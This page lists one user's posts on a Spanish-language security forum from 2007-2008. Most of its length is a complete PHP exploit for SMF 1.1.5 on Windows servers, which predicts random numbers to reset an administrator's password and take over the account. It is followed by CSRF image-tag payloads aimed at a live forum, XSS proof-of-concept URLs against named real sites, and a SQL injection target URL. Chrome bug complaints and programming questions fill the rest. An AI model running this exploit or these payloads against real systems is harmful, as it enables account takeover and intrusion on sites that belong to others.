elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Tutorial básico de Quickjs


  Mostrar Temas
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42
381  Seguridad Informática / Nivel Web / Quieres ser admin en un foro SMF 1.1.5? en: 7 Septiembre 2008, 04:57 am
El único inconveniente es que funciona para servidores que corren con Window$  :P (windows pwned!)

código:
Código
  1. <?php
  2. echo "---------------------------------------------------------------\n";
  3. echo "SMF <= 1.1.5 Admin Reset Password Exploit (win32-based servers)\n";
  4. echo "(c)oded by Raz0r (http://Raz0r.name/)\n";
  5. echo "---------------------------------------------------------------\n";
  6.  
  7. if ($argc<3) {
  8.   echo "USAGE:\n";
  9.   echo "~~~~~~\n";
  10.   echo "php {$argv[0]} [host] [path] OPTIONS\n\n";
  11.   echo "[host] - target server where SMF is installed\n";
  12.   echo "[path] - path to SMF\n\n";
  13.   echo "OPTIONS:\n";
  14.   echo "--userid=[value] (default: 1)\n";
  15.   echo "--username=[value] (default: admin)\n";
  16.   echo "examples:\n";
  17.   echo "php {$argv[0]} site.com /forum/\n";
  18.   echo "php {$argv[0]} site.com / --userid=2 --username=odmen\n";
  19.   die;
  20. }
  21.  
  22. /**
  23. * Software site: http://www.simplemachines.org
  24. *
  25. * SMF leaks current state of random number generator through hidden input parameter `sc`
  26. * of the password reminder form:
  27. *
  28. * $_SESSION['rand_code'] = md5(session_id() . rand());
  29. * $sc = $_SESSION['rand_code'];
  30. *
  31. * Since max random number generated with rand() on win32 is 32767 and session id
  32. * is known an attacker can reverse the md5 hash and get the random number value.
  33. * On win32 every random number generated with rand() is used as a seed for the next
  34. * random number. So if SMF is installed on win32 platform an attacker can predict
  35. * all the next random numbers. When password reset is requested SMF uses rand()
  36. * function to generate validation code:
  37. *
  38. * $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  39. *
  40. * So prediction of the validation code is possible and an atacker can set his
  41. * own password for any user.
  42. *
  43. * More information about random number prediction:
  44. * http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/
  45. *
  46. * More information about the behaviour of rand() on win32 (in Russian):
  47. * http://raz0r.name/articles/magiya-sluchajnyx-chisel-chast-2/
  48. */
  49.  
  50. ini_set("max_execution_time",0);
  51. ini_set("default_socket_timeout",10);
  52.  
  53. $host = $argv[1];
  54. $path = $argv[2];
  55.  
  56. for($i=3;$i<=$argc;$i++){
  57.   if(isset($argv[$i]) && strpos($argv[$i],"--userid=")!==false) {
  58.       list(,$userid) = explode("=",$argv[$i]);
  59.   }
  60.   if (isset($argv[$i]) && strpos($argv[$i],"--username=")!==false) {
  61.       list(,$username) = explode("=",$argv[$i]);
  62.   }
  63. }
  64.  
  65. if(!isset($userid))$userid="1";
  66. if(!isset($username))$username="admin";
  67.  
  68. $sess = md5(mt_rand());
  69. echo "[~] Connecting to $host ... ";
  70. $ock = fsockopen($host,80);
  71. if($ock) echo "OK\n"; else die("failed\n");
  72.  
  73. $packet = "GET {$path}index.php?action=reminder HTTP/1.1\r\n";
  74. $packet.= "Host: {$host}\r\n";
  75. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  76. $packet.= "Keep-Alive: 300\r\n";
  77. $packet.= "Connection: keep-alive\r\n\r\n";
  78.  
  79. fputs($ock, $packet);
  80.  
  81. while(!feof($ock)) {
  82.   $resp = fgets($ock);
  83.   preg_match('@name="sc" value="([0-9a-f]+)"@i',$resp,$out);
  84.   if(isset($out[1])) {
  85.       $md5 = $out[1];
  86.       break;
  87.   }
  88. }
  89.  
  90. if($md5) {
  91.   $seed = getseed($md5);
  92.   if($seed) {
  93.       echo "[+] Seed for next random number is $seed\n";
  94.   } else die("[-] Can't calculate seed\n");
  95. }
  96. else die("[-] Random number hash not found\n");
  97.  
  98. function getseed($md5) {
  99.   global $sess;
  100.   for($i=0;$i<=32767;$i++){
  101.       if($md5 == md5($sess . $i)) {
  102.           return $i;
  103.       }
  104.   }
  105. }
  106.  
  107. $sc = md5($sess . $seed);
  108. $data   = "user=".urlencode($username)."&sc=$sc";
  109. $packet = "POST {$path}index.php?action=reminder;sa=mail HTTP/1.1\r\n";
  110. $packet.= "Host: {$host}\r\n";
  111. $packet.= "Cookie: PHPSESSID=$sess;\r\n";
  112. $packet.= "Connection: close\r\n";
  113. $packet.= "Content-Type: application/x-www-form-urlencoded\r\n";
  114. $packet.= "Content-Length: ".strlen($data)."\r\n\r\n";
  115. $packet.= $data;
  116.  
  117. fputs($ock, $packet);
  118.  
  119. $resp='';
  120. while(!feof($ock)) {
  121.   $resp .= fgets($ock);
  122. }
  123.  
  124. if(preg_match("@HTTP/1.(0|1) 200 OK@i",$resp)===false) {
  125.   die("[-] An error ocurred while requesting validation code\n");
  126. }
  127.  
  128. if(strpos($resp,"javascript:history.go(-1)")!==false) {
  129.   die("[-] Invalid username\n");
  130. }
  131.  
  132. srand($seed);
  133. for($i=0;$i<6;$i++){
  134.   rand();
  135. }
  136. $password = substr(preg_replace('/\W/', '', md5(rand())), 0, 10);
  137. echo "[+] Success! To set password visit this link:\nhttp://{$host}{$path}index.php?action=reminder;sa=setpassword;u={$userid};code=$password\n";
  138. ?>
  139.  
  140. # milw0rm.com [2008-09-06]

Fuentes:
http://milw0rm.com/exploits/6392
http://www.jccharry.com/blog/2008/09/07/whk_vulnerabilidad-en-sistema-de-foros-smf-115-y-versiones-anteriores.html
382  Seguridad Informática / Bugs y Exploits / [°] Recopilatorio de Bugs/Exploits en Google Chrome win32 en: 3 Septiembre 2008, 00:45 am
No se si soy yo que ando con la mala suerte pero me he encontrado con todos los contras de este nuevo explorador de google :(

acá dejo el mensaje que intenté dejar en el foro de discució de google chrome pero no pude.

Citar
1. "Debates > Sugerencias > Sugerencias y problemas d google chrome"
=> le falta una "de" :P

2. "Error 2 (net::ERR_FAILED): Error desconocido." => Eso sucede al
visitar un sitio con el protocolo FTP sin conexión, ahora cuando
ingreso "http://www.noexistolalalla%27%22%3E%3Ch1%3Ea.com/" dice
"Error 300 (net::ERR_INVALID_URL): Error desconocido.", claro, ahora
veo que la mayoría de los errores arrojados no son definidos por el
explorador pero si por la librería.

3. ¿Porque solo se lanzó para Windows y no para linux?

4. Me hace falta el botón "home" para no tener que posicionar el mouse
sobre la barradel explorador y escribir.

5. Podría haber alguna compatibilidad con addons de Firefox *.xpi para
utilizar mis complementos necesarios como noscript y cookiesedit?

6. al descargar un archivo me aparecen las opciones abajo pero no me
da la opción de "cancelar!!" y tampoco me da la opción de cancelar
todas... quepasaría si alguien me lanza una bomba de iframes hacia
archivos fakes descargables? me llenaría la bandeja de descargas sin
poder eliminarlas todas.

7. en los textboxs de los alerts de javascript podría dar la opción de
seleccionar el texto para poder copiar y pegar en caso de que se
necesite al igual que firefox en ubuntu.

------- EDITADO -------

Acabo de tener un encontrón con el explorador de google :/

Lo que hice fue pedir una url muy larga donde ovbiamente no existía y este me redireccionó hacia una pantala con el logo de google donde decía que la dirección dns no era válida, traté de ver el código fuente pero no me dejaba asi que con el botón derecho le di copiar dirección url de la imagen (logo de google) y pegué en otra pestaña y pude evr que este se localizaba en el sertvidor de google y no en mi localhost, antes de dar enter me apareció un error y se frizó causando una denegación de servicio y dandome la opción de reiniciar el explorador, no obstante me arrojó otra pantalla donde decía que no se podía cerrar la pestaña asi que me daba la opción de cerrar el explorador por completo desmintiendo el mito que decian en el video que si una pestaña fallaba entonces las demas quedaban intactas.
al reiniciar este me seguía arrojando errores y ya no puedo volver a iniciarlo con normalidad. Tube que entrar con firefox :/

AppName: chrome.exe    AppVer: 0.0.0.0    ModName: chrome.dll
ModVer: 0.2.149.27    Offset: 0005bda6

http://img148.imageshack.us/img148/6228/error003ww1.png
http://img148.imageshack.us/img148/4452/error002sp1.png

Y para rematar este foro me lanza un error y no puedo postear este tema ¬¬ tube que borrar el anterior y crearlo nuevamente.
http://img386.imageshack.us/img386/8642/error004zg8.png

Probaré desintalando :(

Las imagenes:






Estubo buena la idea de separar las ventanas por procesos pero el dr watson te mata el proceso padre asi que se terminan cerrando todas las pestañas por igual  :xD

Ahora que busco el contacto para reportar esto el sitio de google me manda a un error 404  :¬¬ y para reportar bugs debo iniciar el explorador que no quiere iniciar  :¬¬ que rabia, mejor me quedo con mi firefox, es mas estable y seguro pero no mas rápido  :P la estabilidad y seguridad no la transo por la rapidez, que se jodan los usuarios que les guste jugar mientras los mandan a chingar con DoS, yo prefiero ff.

Editado:

Cuando inicias por primera ves el chrome este te crea un archivo llamado "First Run" sin ningún contenido dentro y al reiniciarlo se iicia normal pero.. que pasa si borramos ese archivo? comienza a importar todo nuevamente y aparecen todas las vienvenidas. aunque es un poco molesto podrían haberlo hecho guardando los valores dentro del registro del sistema no?

Lo bueno de acá es que puedes editar tus mensajes si quieres añadir algo o responderte :p no como en los foros de gogle que con suerte te dejan enviar un mensaje por dia XD
383  Seguridad Informática / Nivel Web / [°] CSRF en foros SMF => 1.1.5 en: 23 Agosto 2008, 09:41 am
Por un foro limpio y ordenado vivan los CSRF de SMF 1.1.5  :P

visualiza el index del foro.

Fuente:
http://www.jccharry.com/comunidad/index.php?board=8.0

Código:
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=1&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=2&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=4&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=6&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=9&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=10&url=http://foro.elhacker.net/[/img]
384  Seguridad Informática / Nivel Web / Bug en nasa.gov en: 17 Agosto 2008, 16:23 pm
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

Que chulo está este bug  :P los parámetros del reproductor son remotos y no locales.

Fuente: http://www.jccharry.com/comunidad/index.php?topic=5.0
385  Seguridad Informática / Nivel Web / Vulnerabilidad universal en foros y blogs (csrf) en: 20 Julio 2008, 03:59 am
Bueno, he encontrado una falla que permitiría crear un post y no permitir que alguien pueda responder o que algún administrador/moderador pueda borrartelo.

Esta falla afecta a la mayoría de los sistemas en el cual puedes postear o crear usuarios en linea y no tan solo foros.

La explicación está acá:

Fuente:
http://foro.new-bytes.net/f28/vulnertabilidad-universal-en-foros-y-blogs-t344.html
386  Programación / Programación Visual Basic / HTTPS SSL con Winsock control en: 9 Julio 2008, 04:55 am
Necesito manipular un sitio que trabaja solamente con https utilizando Sockets y no ieframe.

Alguien sabe algo del tema???

Por ahi leí algo sobre winsock 2.0 pero creo que es solo para .net y yo lo necesito para vb6.
387  Seguridad Informática / Nivel Web / XSS en el instalador de SMF en: 19 Mayo 2008, 00:24 am
Curosiando unos minutos encontré algunos instaladores de smf y me di cuenta que la variable  pass_string tiene XSS en método GET.

POC:
Código:
http://casa.zimzum.es/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.evolutiv.eu/SMF/install.php?&obgz=1&pass_string=<h1>WHK
http://world-eyes.fr/smf/install.php?obgz=1&pass_string=<h1>WHK
http://www.pelusonas.com/foro/install.php?obgz=1&pass_string=<h1>WHK

Fuente:
http://www.google.cl/search?hl=es&q=allinurl%3Asmf+%2B+install.php

Salu2.
388  Programación / Programación Visual Basic / Modificar el skin de un formulario sin dependencias. en: 30 Enero 2008, 23:49 pm
estuve buscando como modificar la mascara de un formulario y encontré muchas cosas como por ejemplo el vbskinner y el actskin4.ocx pero cuando necesito crear pequeños programas resulta muy molestoso incluir un chingo de librerías para un programa que pesa 100 kilos.

Intenté crear mis propios skins con controles de usuario pero de igual forma resulta un poco tedioso porque hay que modificar el formulario son bordes y pegar el control encima y es muy tedioso crear los botones.

Pensaba que talves habría alguna api o algo que me pudiera permitir manejar estos efectos visuales sin la necesidad de librerías extras, de esta forma solo necesitaría crear controles de usuario sin importar calcular tamaño del formulario ni nada.

Hay alguna fuente de actskin4.ocx o algo que me permita estudiar como hacerlo manualmente sin librerías extras?
389  Seguridad Informática / Nivel Web / Inyección SQL y XSS en el servidor de la revista @rroba en: 26 Diciembre 2007, 18:58 pm
El post anterior fue borrado a falta de la fuente original de la noticia por lo cual lo expongo nuevamente.


Mirando unas revistas sobre seguridad informática, pude encontrar esta donde al parecer lo de la seguridad es tan solo un producto que se ofrece en hojas pero nada en la verdadera práctica (Como dicen.. en casa de herrero, cuchillo de palo).

Encontré múltiples vulnerabilidades de tipo Inyección SQL además de variados XSS (Cross Site Scripting) en casi todos sus formularios.

Por ejemplo:
Código:
http://www.megamultimedia.com/arroba/suscripciones/paso1.asp?idrevista=[SQL INYECCION]

Donde en este:
Código:
http://www.megamultimedia.com/arroba/suscripciones/

Y muchos otros directorios desvelan sus páginas llenas de bugs.

Las múltiples vulnerabilidades ya fueron avisadas y espero que pronto las reparen ya que tienen en juego tanto al propio servidor como a los usuarios de su foro.

Fuente:
http://whk.h4ck1ng.net/2007-12.26/inyeccion-sql-y-xss-en-el-servidor-de-la-revista-rroba/
390  Programación / PHP / Operación aritmética en: 20 Diciembre 2007, 09:23 am
Hola.
Tengo el siguiente caso:

$operacion = "1+5-8/7";

Y necesito que me haga la operación completa y que me la imprima en pantalla, quería saber si existe alguna función que lo haga automaticamente o no para ver la posibilidad de separar numeros de simbolos e ingeniarmela para que realize cada operación necesaria.

Se supone que $operación debería ir en una variable, o sea que verías un formulario donde diga "ingrese la operación" y escribes 1+5-8/7 y al dar enter debría aparecer el resultado.
Páginas: 1 ... 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 [39] 40 41 42
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines